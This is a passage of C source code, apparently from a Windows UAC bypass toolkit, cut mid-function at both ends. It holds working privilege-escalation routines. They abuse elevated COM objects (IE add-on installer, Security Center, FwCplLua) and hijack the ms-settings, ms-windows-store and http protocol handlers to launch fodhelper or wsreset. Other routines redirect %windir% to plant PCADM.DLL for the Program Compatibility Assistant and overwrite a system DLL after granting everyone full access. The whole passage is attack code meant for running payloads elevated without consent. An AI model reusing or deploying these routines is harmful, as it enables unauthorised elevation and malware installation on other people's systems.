if (!fusUtilScanDirectory(szFileName,
TEXT("*.dll"),
(pfnFusionScanFilesCallback)fusUtilFindFileByMVIDCallback,
&scanParam))
{
break;
}
lpTargetFileName = scanParam.lpFileName;
if (lpTargetFileName == NULL)
break;
//
// Read existing file to memory.
//
origFileBuffer = supReadFileToBuffer(lpTargetFileName, &origSize);
if (origFileBuffer == NULL)
break;
//
// Remember old file security permissions.
//
oldSecurity = NULL;
if (!ucmMasqueradedGetObjectSecurityCOM(lpTargetFileName,
DACL_SECURITY_INFORMATION,
SE_FILE_OBJECT,
&oldSecurity))
{
break;
}
//
// Reset target file permissions.
//
if (!ucmMasqueradedSetObjectSecurityCOM(lpTargetFileName,
DACL_SECURITY_INFORMATION,
SE_FILE_OBJECT,
T_SDDL_ALL_FOR_EVERYONE))
{
break;
}
bSecurityReset = TRUE;
//
// Overwrite file with Fubuki.
//
hFile = CreateFile(lpTargetFileName,
GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
if (hFile != INVALID_HANDLE_VALUE) {
WriteFile(hFile, ProxyDll, ProxyDllSize, &bytesIO, NULL);
SetEndOfFile(hFile);
CloseHandle(hFile);
}
else
break;
//
// Run target.
//
_strcpy(szTargetProc, g_ctx->szSystemDirectory);
_strcat(szTargetProc, MMC_EXE);
if (supRunProcess2(szTargetProc,
WF_MSC,
NULL,
SW_SHOW,
SUPRUNPROCESS_TIMEOUT_DEFAULT))
{
MethodResult = STATUS_SUCCESS;
}
} while (FALSE);
if (lpAssemblyFilePath)
supHeapFree(lpAssemblyFilePath);
//
// Restore original file contents and permissions.
//
if (origFileBuffer) {
if (lpTargetFileName) {
hFile = CreateFile(lpTargetFileName,
GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
if (hFile != INVALID_HANDLE_VALUE) {
WriteFile(hFile, origFileBuffer, origSize, &bytesIO, NULL);
SetEndOfFile(hFile);
CloseHandle(hFile);
}
}
supVirtualFree(origFileBuffer, NULL);
}
if (oldSecurity) {
if (bSecurityReset && lpTargetFileName) {
ucmMasqueradedSetObjectSecurityCOM(lpTargetFileName,
DACL_SECURITY_INFORMATION,
SE_FILE_OBJECT,
oldSecurity);
}
CoTaskMemFree(oldSecurity);
}
if (lpTargetFileName) {
supHeapFree(lpTargetFileName);
}
if (!NT_SUCCESS(MethodResult))
supSetGlobalCompletionEvent();
return MethodResult;
}
/*
* ucmIeAddOnInstallMethod
*
* Purpose:
*
* Bypass UAC by IE Admin Add-On Installer COM object.
*
*/
NTSTATUS ucmIeAddOnInstallMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HRESULT r = E_FAIL, hr_init;
IIEAdminBrokerObject* BrokerObject = NULL;
IActiveXInstallBroker* InstallBroker = NULL;
BSTR adminInstallerUuid = NULL;
BSTR cacheItemFilePath = NULL, fileToVerify = NULL;
ULONG dummy = 0;
PUCHAR dummyPtr = NULL;
PWCHAR lpPayloadFile = NULL, lpTargetDir = NULL, lpFileName = NULL, lpDirectory = NULL;
SIZE_T cchBuffer;
HANDLE processHandle = NULL;
BSTR workdirBstr, emptyBstr;
WCHAR szDummyTarget[MAX_PATH * 2];
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
if (!supReplaceDllEntryPoint(
ProxyDll,
ProxyDllSize,
FUBUKI_DEFAULT_ENTRYPOINT,
TRUE))
{
break;
}
//
// VerifyFile required.
//
HRESULT_BREAK_ON_FAILED(
CoInitializeSecurity(NULL,
-1,
NULL,
NULL,
RPC_C_AUTHN_LEVEL_CONNECT,
RPC_C_IMP_LEVEL_IMPERSONATE,
NULL,
0,
NULL));
//
// Allocated elevated factory object.
//
HRESULT_BREAK_ON_FAILED(
ucmAllocateElevatedObject(T_CLSID_IEAAddonInstaller,
&IID_IEAxiAdminInstaller,
CLSCTX_LOCAL_SERVER,
&BrokerObject));
HRESULT_BREAK_ON_FAILED(
BrokerObject->lpVtbl->InitializeAdminInstaller(BrokerObject,
NULL,
0,
&adminInstallerUuid));
//
// Query install broker object.
//
HRESULT_BREAK_ON_FAILED(
BrokerObject->lpVtbl->QueryInterface(BrokerObject,
&IID_IEAxiInstaller2,
&InstallBroker));
_strcpy(szDummyTarget, g_ctx->szSystemDirectory);
_strcat(szDummyTarget, CONSENT_EXE);
//
// Verify image embedded signature.
// Uppon success copy given file to the temporary directory and return full filepath.
//
fileToVerify = SysAllocString(szDummyTarget);
if (fileToVerify) {
r = InstallBroker->lpVtbl->VerifyFile(InstallBroker,
adminInstallerUuid,
(HWND)INVALID_HANDLE_VALUE,
fileToVerify,
fileToVerify,
NULL,
WTD_UI_NONE,
WTD_UICONTEXT_EXECUTE,
&IID_IUnknown,
&cacheItemFilePath,
&dummy,
&dummyPtr);
CoTaskMemFree(dummyPtr);
SysFreeString(fileToVerify);
}
HRESULT_BREAK_ON_FAILED(r);
//
// Kill file in cache
//
if (!ucmMasqueradedDeleteDirectoryFileCOM(cacheItemFilePath))
break;
//
// Replace file in cache with Fubuki.
//
cchBuffer = (SIZE_T)SysStringLen(cacheItemFilePath);
lpPayloadFile = (PWCHAR)supHeapAlloc(cchBuffer * 2);
if (lpPayloadFile == NULL)
break;
lpTargetDir = (PWCHAR)supHeapAlloc(cchBuffer * 2);
if (lpTargetDir == NULL)
break;
lpFileName = _filename(cacheItemFilePath);
if (lpFileName == NULL)
break;
_strcpy(lpPayloadFile, g_ctx->szTempDirectory);
_strcat(lpPayloadFile, lpFileName);
if (!supWriteBufferToFile(lpPayloadFile, ProxyDll, ProxyDllSize))
break;
lpDirectory = _filepath(cacheItemFilePath, lpTargetDir);
if (lpDirectory == NULL)
break;
if (!ucmMasqueradedMoveCopyFileCOM(lpPayloadFile, lpDirectory, TRUE))
break;
//
// Run file from cache.
//
workdirBstr = SysAllocString(g_ctx->szTempDirectory);
if (workdirBstr) {
emptyBstr = SysAllocString(TEXT(""));
if (emptyBstr) {
r = InstallBroker->lpVtbl->RunSetupCommand(InstallBroker,
adminInstallerUuid,
NULL,
cacheItemFilePath,
emptyBstr,
workdirBstr,
emptyBstr,
4, //RSC_FLAG_QUIET
&processHandle); //there is always no process handle on output, ignore.
SysFreeString(emptyBstr);
}
SysFreeString(workdirBstr);
if (r == E_INVALIDARG)
MethodResult = STATUS_SUCCESS;
}
} while (FALSE);
//
// Post execution cleanup.
//
if (InstallBroker)
InstallBroker->lpVtbl->Release(InstallBroker);
if (BrokerObject)
BrokerObject->lpVtbl->Release(BrokerObject);
if (adminInstallerUuid)
SysFreeString(adminInstallerUuid);
if (NT_SUCCESS(MethodResult) && lpDirectory) {
ucmMasqueradedDeleteDirectoryFileCOM(lpDirectory);
}
if (cacheItemFilePath)
SysFreeString(cacheItemFilePath);
if (lpTargetDir)
supHeapFree(lpTargetDir);
if (lpPayloadFile)
supHeapFree(lpPayloadFile);
if (hr_init == S_OK)
CoUninitialize();
return MethodResult;
}
/*
* ucmWscActionProtocolMethod
*
* Purpose:
*
* Bypass UAC by SecurityCenter COM object and HTTP protocol registry hijack.
*
*/
NTSTATUS ucmWscActionProtocolMethod(
_In_ LPCWSTR lpszPayload
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HRESULT r = E_FAIL, hr_init;
IWscAdmin* WscAdminObject = NULL;
LPOLESTR protoGuidString = NULL;
USER_ASSOC_PTR SetUserAssoc;
GUID guid;
RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
if (CoCreateGuid(&guid) != S_OK)
break;
if (StringFromCLSID(&guid, &protoGuidString) != S_OK)
break;
MethodResult = supFindUserAssocSet(&SetUserAssoc);
if (!NT_SUCCESS(MethodResult)) {
break;
}
MethodResult = supRegisterShellAssoc(T_PROTO_HTTP,
protoGuidString,
&SetUserAssoc,
lpszPayload,
FALSE,
NULL);
if (!NT_SUCCESS(MethodResult)) {
break;
}
MethodResult = STATUS_ACCESS_DENIED;
r = ucmAllocateElevatedObject(T_CLSID_SecurityCenter,
&IID_WscAdmin,
CLSCTX_LOCAL_SERVER,
&WscAdminObject);
if (SUCCEEDED(r)) {
r = WscAdminObject->lpVtbl->Initialize(WscAdminObject);
if (SUCCEEDED(r)) {
supEnableToastForProtocol(T_PROTO_HTTP, FALSE);
r = WscAdminObject->lpVtbl->DoModalSecurityAction(WscAdminObject, NULL, 103, NULL);
Sleep(1000);
if (SUCCEEDED(r)) MethodResult = STATUS_SUCCESS;
}
}
} while (FALSE);
//
// Cleanup.
//
if (WscAdminObject)
WscAdminObject->lpVtbl->Release(WscAdminObject);
if (protoGuidString) {
supUnregisterShellAssoc(T_PROTO_HTTP,
protoGuidString,
&SetUserAssoc);
CoTaskMemFree(protoGuidString);
}
if (hr_init == S_OK)
CoUninitialize();
return MethodResult;
}
/*
* ucmFwCplLuaMethod2
*
* Purpose:
*
* Bypass UAC using FwCplLua undocumented COM interface and shell association registry hijack.
* This function expects that supMasqueradeProcess was called on process initialization.
*
* Note:
*
* Protocol name defined as const (e.g. pe386).
* ProgId generated with CoCreateGuid and will be different each run.
*
*/
NTSTATUS ucmFwCplLuaMethod2(
_In_ LPCWSTR lpszPayload
)
{
BOOL fEnvSet = FALSE, fDirCreated = FALSE;
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HRESULT r = E_FAIL, hr_init;
ULONG DataSize = 0, SnapinSize = 0;
SIZE_T nLen, PayloadDirNameLen = 0, MscBufferSize = 0, MscSize = 0, MscBytesIO = 0, ProtocolNameLen;
PVOID SnapinResource = NULL, SnapinData = NULL, MscBufferPtr = NULL;
PVOID ImageBaseAddress = g_hInstance;
LPOLESTR protoGuidString = NULL;
CHAR* pszMarker;
IFwCplLua* FwCplLua = NULL;
USER_ASSOC_PTR SetUserAssoc;
GUID guid;
WCHAR szBuffer[MAX_PATH + 1];
WCHAR szPayloadDir[MAX_PATH * 2];
CHAR szProtocol[MAX_PATH];
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));
RtlSecureZeroMemory(&szPayloadDir, sizeof(szPayloadDir));
do {
//
// Create GUID.
//
if (CoCreateGuid(&guid) != S_OK)
break;
if (StringFromCLSID(&guid, &protoGuidString) != S_OK)
break;
//
// Convert protocol name to ANSI to be used in msc modification next.
//
ProtocolNameLen = _strlen(MYSTERIOUSCUTETHING);
RtlSecureZeroMemory(szProtocol, sizeof(szProtocol));
WideCharToMultiByte(CP_ACP, 0,
MYSTERIOUSCUTETHING,
-1,
szProtocol,
sizeof(szProtocol),
NULL,
NULL);
_strcat_a(szProtocol, ":");
//
// Decrypt and decompress custom Kamikaze snap-in.
//
SnapinResource = supLdrQueryResourceData(
KAMIKAZE_ID,
ImageBaseAddress,
&DataSize);
if (SnapinResource) {
SnapinData = g_ctx->DecompressRoutine(KAMIKAZE_ID, SnapinResource, DataSize, &SnapinSize);
if (SnapinData == NULL)
break;
}
else
break;
//
// Create destination dir "system32" in %temp%
//
_strcpy(szPayloadDir, g_ctx->szTempDirectory);
_strcat(szPayloadDir, SYSTEM32_DIR_NAME);
PayloadDirNameLen = _strlen(szPayloadDir);
if (!CreateDirectory(szPayloadDir, NULL)) {
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
}
fDirCreated = TRUE;
//
// Set new %windir% environment variable.
//
_strcpy(szBuffer, g_ctx->szTempDirectory);
nLen = _strlen(szBuffer);
if (szBuffer[nLen - 1] == L'\\') {
szBuffer[nLen - 1] = 0;
}
fEnvSet = supSetEnvVariable(FALSE, NULL, T_WINDIR, szBuffer);
if (fEnvSet == FALSE)
break;
//
// Find UserAssocSet
//
MethodResult = supFindUserAssocSet(&SetUserAssoc);
if (!NT_SUCCESS(MethodResult))
break;
//
// Register shell protocol.
//
MethodResult = supRegisterShellAssoc(MYSTERIOUSCUTETHING,
protoGuidString,
&SetUserAssoc,
lpszPayload,
TRUE,
NULL);
if (!NT_SUCCESS(MethodResult))
break;
MscBufferSize = ALIGN_UP_BY(1 + (SIZE_T)SnapinSize + (SIZE_T)sizeof(szProtocol), (SIZE_T)PAGE_SIZE);
MscBufferPtr = supVirtualAlloc(
&MscBufferSize,
DEFAULT_ALLOCATION_TYPE,
DEFAULT_PROTECT_TYPE, NULL);
if (MscBufferPtr == NULL)
break;
//
// Reconfigure msc snapin and write it to the %temp%\system32.
//
pszMarker = _strstri_a((CHAR*)SnapinData, (const CHAR*)KAMIKAZE_MARKER);
if (pszMarker) {
//
// Copy first part of snapin (unchanged).
//
MscBytesIO = (ULONG)(pszMarker - (PCHAR)SnapinData);
MscSize = MscBytesIO;
RtlCopyMemory(MscBufferPtr, SnapinData, MscBytesIO);
//
// Copy modified part.
//
MscBytesIO = ProtocolNameLen;
//Include ":" element.
MscBytesIO++;
//Copy guid.
RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), (PVOID)&szProtocol, MscBytesIO);
MscSize += MscBytesIO;
//
// Copy all of the rest.
//
while (*pszMarker != 0 && *pszMarker != '<') {
pszMarker++;
}
MscBytesIO = (ULONG)(((PCHAR)SnapinData + SnapinSize) - pszMarker);
RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), pszMarker, MscBytesIO);
MscSize += MscBytesIO;
//
// Write result to the file.
//
_strcat(szPayloadDir, TEXT("\\"));
_strcat(szPayloadDir, WF_MSC);
if (!supWriteBufferToFile(szPayloadDir, MscBufferPtr, (ULONG)MscSize))
break;
supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);
MscBufferPtr = NULL;
}
//
// Get elevated COM object for FwCplLua interface.
//
r = ucmAllocateElevatedObject(
T_CLSID_FwCplLua,
&IID_IFwCplLua,
CLSCTX_LOCAL_SERVER,
&FwCplLua);
if (r != S_OK)
break;
if (FwCplLua == NULL) {
break;
}
//
// Execute method from FwCplLua interface.
// This will trigger our payload as shell will attempt to run it.
//
r = FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua);
if (SUCCEEDED(r))
MethodResult = STATUS_SUCCESS;
} while (FALSE);
//
// Cleanup.
//
if (MscBufferPtr) {
supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);
}
if (SnapinData) {
supSecureVirtualFree(SnapinData, SnapinSize, NULL);
}
if (FwCplLua != NULL) {
FwCplLua->lpVtbl->Release(FwCplLua);
}
Sleep(2000);
if (protoGuidString) {
supUnregisterShellAssoc(MYSTERIOUSCUTETHING,
protoGuidString,
&SetUserAssoc);
CoTaskMemFree(protoGuidString);
}
if (hr_init == S_OK)
CoUninitialize();
if (fEnvSet)
supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL);
if (fDirCreated) {
DeleteFile(szPayloadDir);
szPayloadDir[PayloadDirNameLen] = 0;
RemoveDirectory(szPayloadDir);
}
return MethodResult;
}
/*
* ucmMsSettingsProtocolMethod
*
* Purpose:
*
* Bypass UAC by registering own ms-settings protocol.
*
*/
NTSTATUS ucmMsSettingsProtocolMethod(
_In_ LPCWSTR lpszPayload
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HRESULT hr_init;
LPOLESTR protoGuidString = NULL;
USER_ASSOC_PTR SetUserAssoc;
GUID guid;
WCHAR szBuffer[MAX_PATH * 2];
RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));
hr_init = CoInitializeEx(NULL, COINIT_MULTITHREADED);
do {
if (CoCreateGuid(&guid) != S_OK)
break;
if (StringFromCLSID(&guid, &protoGuidString) != S_OK)
break;
//
// Find UserAssocSet
//
MethodResult = supFindUserAssocSet(&SetUserAssoc);
if (!NT_SUCCESS(MethodResult))
break;
//
// Register shell protocol.
//
MethodResult = supRegisterShellAssoc(T_MSSETTINGS,
protoGuidString,
&SetUserAssoc,
lpszPayload,
TRUE,
NULL);
if (NT_SUCCESS(MethodResult)) {
_strcpy(szBuffer, g_ctx->szSystemDirectory);
_strcat(szBuffer, FODHELPER_EXE);
MethodResult = supRunProcess(szBuffer, NULL) ?
STATUS_SUCCESS : STATUS_ACCESS_DENIED;
}
} while (FALSE);
//
// Cleanup.
//
if (protoGuidString) {
supUnregisterShellAssoc(T_MSSETTINGS,
protoGuidString,
&SetUserAssoc);
CoTaskMemFree(protoGuidString);
}
if (SUCCEEDED(hr_init))
CoUninitialize();
return MethodResult;
}
/*
* ucmxGetServiceState
*
* Purpose:
*
* Return service state.
*
*/
DWORD ucmxGetServiceState(
_In_ SC_HANDLE ServiceHandle
)
{
SERVICE_STATUS_PROCESS svcStatus;
ULONG dummy;
if (QueryServiceStatusEx(
ServiceHandle,
SC_STATUS_PROCESS_INFO,
(LPBYTE)&svcStatus,
sizeof(svcStatus),
&dummy))
{
return svcStatus.dwCurrentState;
}
return SERVICE_STOPPED;
}
/*
* ucmxRunService
*
* Purpose:
*
* Start given service if stopped.
*
*/
BOOLEAN ucmxRunService(
_In_ LPCWSTR lpServiceName
)
{
BOOLEAN bRunning = FALSE;
SC_HANDLE schManager = NULL, schService = NULL;
ULONG dwState, uRetryCount;
do {
schManager = OpenSCManager(
NULL,
SERVICES_ACTIVE_DATABASE,
SC_MANAGER_CONNECT);
if (schManager == NULL)
break;
schService = OpenService(
schManager,
lpServiceName,
SERVICE_QUERY_STATUS | SERVICE_START);
if (schService == NULL)
break;
dwState = ucmxGetServiceState(schService);
if (dwState == SERVICE_RUNNING) {
bRunning = TRUE;
break;
}
if (dwState == SERVICE_PAUSE_PENDING ||
dwState == SERVICE_STOP_PENDING)
{
uRetryCount = 5;
do {
dwState = ucmxGetServiceState(schService);
if (dwState == SERVICE_RUNNING) {
bRunning = TRUE;
break;
}
Sleep(1000);
} while (--uRetryCount);
}
if (dwState == SERVICE_STOPPED) {
if (StartService(schService, 0, NULL)) {
Sleep(1000);
dwState = ucmxGetServiceState(schService);
if (dwState == SERVICE_RUNNING) {
bRunning = TRUE;
break;
}
}
}
} while (FALSE);
if (schService)
CloseServiceHandle(schService);
if (schManager)
CloseServiceHandle(schManager);
return bRunning;
}
/*
* ucmxIsAppXSvcRunning
*
* Purpose:
*
* Return running state of AppXSvc (restart it if stopped).
*
*/
BOOLEAN ucmxIsAppXSvcRunning(
VOID
)
{
return ucmxRunService(T_APPXSVC);
}
/*
* ucmxCleanupNoStore
*
* Purpose:
*
* Remove store association key.
*
*/
VOID ucmxCleanupNoStore(
VOID
)
{
NTSTATUS ntStatus;
HANDLE classesKey = NULL;
WCHAR szBuffer[MAX_PATH + 1];
ntStatus = supOpenClassesKey(NULL, &classesKey);
if (!NT_SUCCESS(ntStatus))
return;
_strcpy(szBuffer, T_MSWINDOWSSTORE);
_strcat(szBuffer, TEXT("\\shell"));
supRegDeleteKeyRecursive(classesKey, szBuffer);
NtClose(classesKey);
}
/*
* ucmxMsStoreProtocolNoStore
*
* Purpose:
*
* Bypass UAC by registering own ms-windows-store protocol.
*
*/
NTSTATUS ucmxMsStoreProtocolNoStore(
_In_ LPCWSTR lpszPayload
)
{
HANDLE classesKey = NULL, protoKey = NULL;
NTSTATUS ntStatus;
SIZE_T sz;
WCHAR szBuffer[MAX_PATH + 1];
ntStatus = supOpenClassesKey(NULL, &classesKey);
if (!NT_SUCCESS(ntStatus))
return ntStatus;
if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,
T_MSWINDOWSSTORE,
0,
NULL,
REG_OPTION_NON_VOLATILE,
MAXIMUM_ALLOWED,
NULL,
(HKEY*)&protoKey,
NULL))
{
RegSetValueEx(protoKey, T_URL_PROTOCOL, 0, REG_SZ, NULL, 0);
RegCloseKey(protoKey);
}
_strcpy(szBuffer, T_MSWINDOWSSTORE);
_strcat(szBuffer, T_SHELL_OPEN);
_strcat(szBuffer, TEXT("\\"));
_strcat(szBuffer, T_SHELL_COMMAND);
if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,
szBuffer,
0,
NULL,
REG_OPTION_NON_VOLATILE,
MAXIMUM_ALLOWED,
NULL,
(HKEY*)&protoKey,
NULL))
{
sz = (_strlen(lpszPayload) + 1) * sizeof(WCHAR);
if (ERROR_SUCCESS == RegSetValueEx(protoKey,
TEXT(""),
0,
REG_SZ,
(BYTE*)lpszPayload,
(DWORD)sz))
{
ntStatus = STATUS_SUCCESS;
}
else {
ntStatus = STATUS_REGISTRY_IO_FAILED;
}
RegCloseKey(protoKey);
}
else {
ntStatus = STATUS_REGISTRY_IO_FAILED;
}
NtClose(classesKey);
return ntStatus;
}
/*
* ucmMsStoreProtocolMethod
*
* Purpose:
*
* Bypass UAC by registering own ms-windows-store protocol.
*
*/
NTSTATUS ucmMsStoreProtocolMethod(
_In_ LPCWSTR lpszPayload
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HRESULT hr_init;
LPOLESTR protoGuidString = NULL;
USER_ASSOC_PTR SetUserAssoc;
GUID guid;
BOOLEAN bAppXRunning = FALSE;
WCHAR szBuffer[MAX_PATH * 2];
RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
bAppXRunning = ucmxIsAppXSvcRunning();
if (bAppXRunning) {
if (CoCreateGuid(&guid) != S_OK)
break;
if (StringFromCLSID(&guid, &protoGuidString) != S_OK)
break;
//
// Find UserAssocSet
//
MethodResult = supFindUserAssocSet(&SetUserAssoc);
if (!NT_SUCCESS(MethodResult)) {
break;
}
supEnableToastForProtocol(T_MSWINDOWSSTORE, FALSE);
//
// Register shell protocol.
//
MethodResult = supRegisterShellAssoc(T_MSWINDOWSSTORE,
protoGuidString,
&SetUserAssoc,
lpszPayload,
TRUE,
T_URL_MS_WIN_STORE);
}
else {
//
// AppXSvc not running or in inconsistent state, try other method.
//
MethodResult = ucmxMsStoreProtocolNoStore(lpszPayload);
}
if (NT_SUCCESS(MethodResult)) {
_strcpy(szBuffer, g_ctx->szSystemDirectory);
_strcat(szBuffer, WSRESET_EXE);
MethodResult = supRunProcess2(
szBuffer,
NULL,
TEXT("open"),
SW_HIDE,
INFINITE) ?
STATUS_SUCCESS : STATUS_ACCESS_DENIED;
}
} while (FALSE);
//
// Cleanup.
//
if (bAppXRunning) {
if (protoGuidString) {
supUnregisterShellAssoc(T_MSWINDOWSSTORE,
protoGuidString,
&SetUserAssoc);
CoTaskMemFree(protoGuidString);
}
}
else {
ucmxCleanupNoStore();
}
if (SUCCEEDED(hr_init))
CoUninitialize();
return MethodResult;
}
#define PCA_MONITOR_PROCESS_NORMAL 0
#define PCA_MONITOR_PROCESS_NOCHAIN 1
#define PCA_MONITOR_PROCESS_AS_INSTALLER 2
/*
* ucmxRemoveLoaderEntryFromRegistry
*
* Purpose:
*
* Cleanup registry entries.
*
*/
ULONG ucmxRemoveLoaderEntryFromRegistry(
_In_ HKEY hRootKey,
_In_ LPCWSTR lpRegPath,
_In_ LPCWSTR lpLoaderName
)
{
HKEY hKey;
DWORD i, dwValuesCount = 0, cchValue, dwType, cRemoved = 0;
WCHAR szValue[MAX_PATH + 1];
do {
if (ERROR_SUCCESS != RegOpenKeyEx(hRootKey,
lpRegPath,
0,
KEY_READ | KEY_SET_VALUE,
&hKey))
{
break;
}
if (ERROR_SUCCESS != RegQueryInfoKey(hKey,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
&dwValuesCount,
NULL,
NULL,
NULL,
NULL))
{
break;
}
if (dwValuesCount == 0)
break;
RtlSecureZeroMemory(&szValue, sizeof(szValue));
for (i = 0; i < dwValuesCount; i++) {
dwType = 0;
cchValue = MAX_PATH;
if (ERROR_SUCCESS == RegEnumValue(hKey,
i,
(LPWSTR)&szValue,
(LPDWORD)&cchValue,
NULL,
&dwType,
NULL,
NULL))
{
if (dwType == REG_BINARY) {
if (NULL != _strstri(szValue, lpLoaderName)) {
if (ERROR_SUCCESS == RegDeleteValue(hKey, szValue))
cRemoved++;
}
}
szValue[0] = 0;
}
}
} while (FALSE);
RegCloseKey(hKey);
return cRemoved;
}
typedef struct _PCA_LOADER_BLOCK {
ULONG OpResult;
WCHAR szLoader[MAX_PATH + 1];
} PCA_LOADER_BLOCK;
/*
* ucmPcaMethod
*
* Purpose:
*
* Bypass UAC using Program Compatibility Assistant.
*
* AlwaysNotify compatible.
*
*/
NTSTATUS ucmPcaMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
BOOL fEnvSet = FALSE, fDirCreated = FALSE, fLoaderCreated = FALSE, fUsePca = TRUE;
ULONG ulResult = 0, seedValue;
NTSTATUS MethodResult = STATUS_ACCESS_DENIED, ntStatus;
HRESULT hr_init;
SIZE_T cchDirName = 0, nLen, viewSize = PAGE_SIZE;
HANDLE hSharedSection = NULL, hSharedEvent = NULL;
HANDLE hShellProcess = NULL;
UNICODE_STRING uStrTaskhost = RTL_CONSTANT_STRING(TASKHOSTW_EXE);
RPC_BINDING_HANDLE rpcHandle = NULL;
RPC_STATUS rpcStatus;
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInfo;
PCA_LOADER_BLOCK* pvLoaderBlock = NULL;
LARGE_INTEGER liValue;
OBJECT_ATTRIBUTES obja;
UNICODE_STRING usObjectName;
WCHAR szBuffer[MAX_PATH * 2], szEnvVar[MAX_PATH * 2];
WCHAR szLoader[MAX_PATH * 2];
WCHAR szLoaderName[64];
WCHAR szLoaderCmdLine[2];
WCHAR szObjectName[MAX_PATH];
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
RtlSecureZeroMemory(&szLoader, sizeof(szLoader));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
do {
if (!ucmxRunService(T_PCASVC))
break;
if (g_ctx->dwBuildNumber < NT_WIN8_RTM) {
fUsePca = FALSE;
}
RtlSecureZeroMemory(&szLoaderName, sizeof(szLoaderName));
seedValue = ~GetTickCount();
liValue.LowPart = RtlRandomEx(&seedValue);
seedValue = GetTickCount();
liValue.HighPart = RtlRandomEx(&seedValue);
supBinTextEncode(liValue.QuadPart, szLoaderName);
_strcat(szLoaderName, TEXT(".exe"));
//
// Create shared loader section.
//
RtlSecureZeroMemory(&szObjectName, sizeof(szObjectName));
_strcpy(szObjectName, TEXT("\\Sessions\\"));
ultostr(NtCurrentPeb()->SessionId, _strend(szObjectName));
_strcat(szObjectName, TEXT("\\BaseNamedObjects\\"));
supGenerateSharedObjectName((WORD)FUBUKI_PCA_SECTION_ID, _strend(szObjectName));
liValue.QuadPart = PAGE_SIZE;
RtlInitUnicodeString(&usObjectName, szObjectName);
InitializeObjectAttributes(&obja, &usObjectName, OBJ_CASE_INSENSITIVE, NULL, NULL);
ntStatus = NtCreateSection(&hSharedSection,
SECTION_ALL_ACCESS,
&obja,
&liValue,
PAGE_READWRITE,
SEC_COMMIT,
NULL);
if (!NT_SUCCESS(ntStatus) || (hSharedSection == NULL)) {
break;
}
ntStatus = NtMapViewOfSection(
hSharedSection,
NtCurrentProcess(),
&pvLoaderBlock,
0,
PAGE_SIZE,
NULL,
&viewSize,
ViewUnmap,
MEM_TOP_DOWN,
PAGE_READWRITE);
if (!NT_SUCCESS(ntStatus) || (pvLoaderBlock == NULL)) {
break;
}
//
// Create completion event.
//
_strcpy(szObjectName, TEXT("\\BaseNamedObjects\\"));
supGenerateSharedObjectName((WORD)FUBUKI_PCA_EVENT_ID, _strend(szObjectName));
RtlInitUnicodeString(&usObjectName, szObjectName);
InitializeObjectAttributes(&obja, &usObjectName, OBJ_CASE_INSENSITIVE, NULL, NULL);
ntStatus = NtCreateEvent(&hSharedEvent,
EVENT_ALL_ACCESS,
&obja,
SynchronizationEvent,
FALSE);
if (!NT_SUCCESS(ntStatus) || (hSharedEvent == NULL)) {
break;
}
//
// Stop WDI\ResolutionHost task.
//
if (!supStopTaskByName(
TEXT("Microsoft\\Windows\\WDI"),
TEXT("ResolutionHost")))
{
break;
}
supEnumProcessesForSession(NtCurrentPeb()->SessionId,
(pfnEnumProcessCallback)supEnumTaskhostTasksCallback, (PVOID)&uStrTaskhost);
//
// Create destination dir "system32"
//
_strcpy(szBuffer, g_ctx->szCurrentDirectory);
_strcat(szBuffer, SYSTEM32_DIR_NAME);
cchDirName = _strlen(szBuffer);
if (!CreateDirectory(szBuffer, NULL)) {
if (GetLastError() != ERROR_ALREADY_EXISTS) {
break;
}
}
fDirCreated = TRUE;
//
// Convert payload for dll hijack.
//
if (!supReplaceDllEntryPoint(
ProxyDll,
ProxyDllSize,
FUBUKI_ENTRYPOINT_PCADLL,
FALSE))
{
break;
}
//
// Drop payload to the fake system32 dir as PCADM.DLL.
//
szBuffer[cchDirName] = 0;
_strcat(szBuffer, TEXT("\\"));
_strcat(szBuffer, PCADM_DLL);
if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize)) {
break;
}
//
// Convert dll to exe to be loader task.
//
if (!supReplaceDllEntryPoint(
ProxyDll,
ProxyDllSize,
FUBUKI_ENTRYPOINT_PCAEXE,
TRUE))
{
break;
}
//
// Drop loader to the temp dir.
//
_strcpy(szLoader, g_ctx->szCurrentDirectory);
_strcat(szLoader, szLoaderName);
fLoaderCreated = supWriteBufferToFile(szLoader, ProxyDll, ProxyDllSize);
if (!fLoaderCreated) {
break;
}
//
// Remember loader name
//
_strcpy(pvLoaderBlock->szLoader, szLoader);
//
// Set new %windir% environment variable.
//
_strcpy(szEnvVar, g_ctx->szCurrentDirectory);
nLen = _strlen(szEnvVar);
if (szEnvVar[nLen - 1] == L'\\') {
szEnvVar[nLen - 1] = 0;
}
